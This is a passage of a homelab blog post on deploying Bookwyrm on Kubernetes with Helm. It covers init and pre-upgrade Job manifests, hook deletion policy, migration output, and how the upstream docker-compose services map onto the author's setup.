</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-init</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-init</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">restartPolicy</span>: <span style="color:#ae81ff">Never</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">init-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">/hl/bookwyrm.sh</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">init</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/hl</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>{{- <span style="color:#ae81ff">end }}</span>
</span></span></code></pre></div><p>So it only gets created when the value <code>runInit</code> is <code>true</code> in the <code>values.yaml</code>
file.</p>
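<p>In practice, running the init therefore means toggling that value for a single
Helm run, roughly like this (release and chart names here are just placeholders
for my actual ones):</p>
<pre tabindex="0"><code># create the init Job as part of the release
helm upgrade --install bookwyrm ./bookwyrm-chart --set runInit=true
# once the Job has completed, the next run removes it again
helm upgrade bookwyrm ./bookwyrm-chart --set runInit=false
</code></pre>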
<p>But for the update Job, which does DB migrations and regenerates static assets,
I was able to use the <code>pre-upgrade</code> hook. The manifest looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">batch/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Job</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-update</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;helm.sh/hook&#34;: </span><span style="color:#ae81ff">pre-upgrade</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-update</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">restartPolicy</span>: <span style="color:#ae81ff">Never</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/bookwyrm:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>: [<span style="color:#e6db74">&#34;bash&#34;</span>]
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">/hl/bookwyrm.sh</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/hl</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">with .Values.env }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            {{- <span style="color:#ae81ff">toYaml . | nindent 11 }}</span>
</span></span><span style="display:flex;"><span>          {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span></code></pre></div><p>Note especially this part:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;helm.sh/hook&#34;: </span><span style="color:#ae81ff">pre-upgrade</span>
</span></span></code></pre></div><p>That is what marks the Job as a hook to be run before anything else is updated.</p>
<p>The upgrade hook has one unfortunate semantic though: it is launched
whenever the Helm release is upgraded, not just when the Bookwyrm version is incremented.
That means that any time there is any change to the chart, even if it is
just an added label for example, the Job will be executed. And it is executed
during the <code>helm upgrade</code> run, before anything else. So you run <code>helm upgrade</code>,
and Helm won&rsquo;t return immediately. It waits for the hook to finish running,
and only then updates all of the other manifests, where necessary. So these Helm
runs will take a bit longer.
But that still seems like a relatively small price compared to having the
instructions written on a documentation page that I need to remember to execute when
Bookwyrm is updated.</p>
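<p>One related detail: Kubernetes Jobs are immutable, so the <code>bookwyrm-update</code> Job
left over from the previous upgrade has to be removed before the next one can be
created. Helm 3&rsquo;s default hook deletion policy, <code>before-hook-creation</code>, already
does exactly that, but it can also be spelled out explicitly in the hook&rsquo;s
annotations:</p>
<pre tabindex="0"><code>metadata:
  annotations:
    helm.sh/hook: pre-upgrade
    helm.sh/hook-delete-policy: before-hook-creation
</code></pre>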
<p>Here is some of the output of my run of the Bookwyrm initialization:</p>
<pre tabindex="0"><code>Running init function...
Operations to perform:
  Apply all migrations: admin, auth, bookwyrm, contenttypes, django_celery_beat, oauth2_provider, sessions
Running migrations:
  Applying contenttypes.0001_initial... OK
  Applying contenttypes.0002_remove_content_type_name... OK
  Applying auth.0001_initial... OK
  Applying auth.0002_alter_permission_name_max_length... OK
  Applying auth.0003_alter_user_email_max_length... OK
  Applying auth.0004_alter_user_username_opts... OK
  [...]
Operations to perform:
  Apply all migrations: django_celery_beat
Running migrations:
  No migrations to apply.
  Your models in app(s): &#39;bookwyrm&#39; have changes that are not yet reflected in a migration, and so won&#39;t be applied.
  Run &#39;manage.py makemigrations&#39; to make new migrations, and then re-run &#39;manage.py migrate&#39; to apply them.
Compiled SASS/SCSS file: &#39;/app/bookwyrm/static/css/themes/bookwyrm-dark.scss&#39;
Compiled SASS/SCSS file: &#39;/app/bookwyrm/static/css/themes/bookwyrm-light.scss&#39;
257 static files copied.
*******************************************
Use this code to create your admin account:
1234-56-78-910-111213
*******************************************
</code></pre><p>Especially the last part is important, as that code is needed to create the
initial admin account.</p>
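<p>Since the code is only printed to stdout, it can be grabbed from the Job&rsquo;s Pod
logs, with something along these lines (namespace assumed):</p>
<pre tabindex="0"><code>kubectl logs -n bookwyrm job/bookwyrm-init
</code></pre>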
<p>With that done, I was finally ready to write the Deployment. For that, I took
the official <a href="https://github.com/bookwyrm-social/bookwyrm/blob/v0.7.5/docker-compose.yml">docker-compose file</a>
as a blueprint:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nginx</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">nginx:1.25.2</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#ae81ff">unless-stopped</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;1333:80&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">web</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./nginx:/etc/nginx/conf.d</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">db</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">postgres:13</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">pgdata:/var/lib/postgresql/data</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">python manage.py runserver 0.0.0.0:8000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_activity</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;8000&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_activity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">redis:7.2.1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">redis-server --requirepass ${REDIS_ACTIVITY_PASSWORD} --appendonly yes --port ${REDIS_ACTIVITY_PORT}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./redis.conf:/etc/redis/redis.conf</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_activity_data:/data</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_broker</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">redis:7.2.1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">redis-server --requirepass ${REDIS_BROKER_PASSWORD} --appendonly yes --port ${REDIS_BROKER_PORT}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./redis.conf:/etc/redis/redis.conf</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker_data:/data</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_worker</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm worker -l info -Q high_priority,medium_priority,low_priority,streams,images,suggested_users,email,connectors,lists,inbox,imports,import_triggered,broadcast,misc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_beat</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">flower</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm flower --basic_auth=${FLOWER_USER}:${FLOWER_PASSWORD} --url_prefix=flower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dev-tools</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">dev-tools</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">/app/dev-tools/</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">profiles</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">tools</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgdata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">static_volume</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">media_volume</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">exports_volume</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_broker_data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis_activity_data</span>:
</span></span><span style="display:flex;"><span><span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">main</span>:
</span></span></code></pre></div><p>It&rsquo;s a pretty long one, so let&rsquo;s go through it one by one. I skipped the Nginx
deployment entirely, as I&rsquo;m using Bookwyrm&rsquo;s S3 support for static assets and
images, and with that, the Nginx deployment doesn&rsquo;t seem to be necessary. For the
same reason, I also don&rsquo;t have any volumes for <code>/app/static</code> and <code>/app/images</code>.
I initially had volumes there, as the docs were not 100% clear on whether the
directories might still be used even with S3, but after a couple of days of
running Bookwyrm, I found them to still be empty and removed the volumes. I
ignored the <code>dev-tools</code> service, as that seemed unnecessary as well. And I
skipped the <code>redis_activity</code> and <code>redis_broker</code> services as well as the <code>db</code>
service, as I had already created those with CloudNativePG and my existing Redis
instance.</p>
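<p>For the S3 part, Bookwyrm is likewise configured purely through its environment.
From memory of the project&rsquo;s <code>.env.example</code>, the relevant settings look roughly
like this; the exact names should be double-checked against the release being
deployed:</p>
<pre tabindex="0"><code>USE_S3=true
AWS_ACCESS_KEY_ID=...
AWS_SECRET_ACCESS_KEY=...
AWS_STORAGE_BUCKET_NAME=bookwyrm
AWS_S3_ENDPOINT_URL=https://s3.example.com
</code></pre>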
<p>That left me with the following services to run:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">python manage.py runserver 0.0.0.0:8000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_activity</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#34;8000&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_worker</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm worker -l info -Q high_priority,medium_priority,low_priority,streams,images,suggested_users,email,connectors,lists,inbox,imports,import_triggered,broadcast,misc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">celery_beat</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm beat -l INFO --scheduler django_celery_beat.schedulers:DatabaseScheduler</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">media_volume:/app/images</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">exports_volume:/app/exports</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">celery_worker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">flower</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build</span>: <span style="color:#ae81ff">.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">command</span>: <span style="color:#ae81ff">celery -A celerywyrm flower --basic_auth=${FLOWER_USER}:${FLOWER_PASSWORD} --url_prefix=flower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env_file</span>: <span style="color:#ae81ff">.env</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">.:/app</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">static_volume:/app/static</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">db</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">redis_broker</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">restart</span>: <span style="color:#66d9ef">on</span>-<span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">networks</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">main</span>:
</span></span></code></pre></div><p>One thing to note is that they all use the same <code>.env</code> file; Bookwyrm&rsquo;s stack
is mostly configured via environment variables, which I applaud. To avoid having
to copy the environment for each container, I added this section to my <code>values.yaml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">POD_IP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">fieldRef</span>:
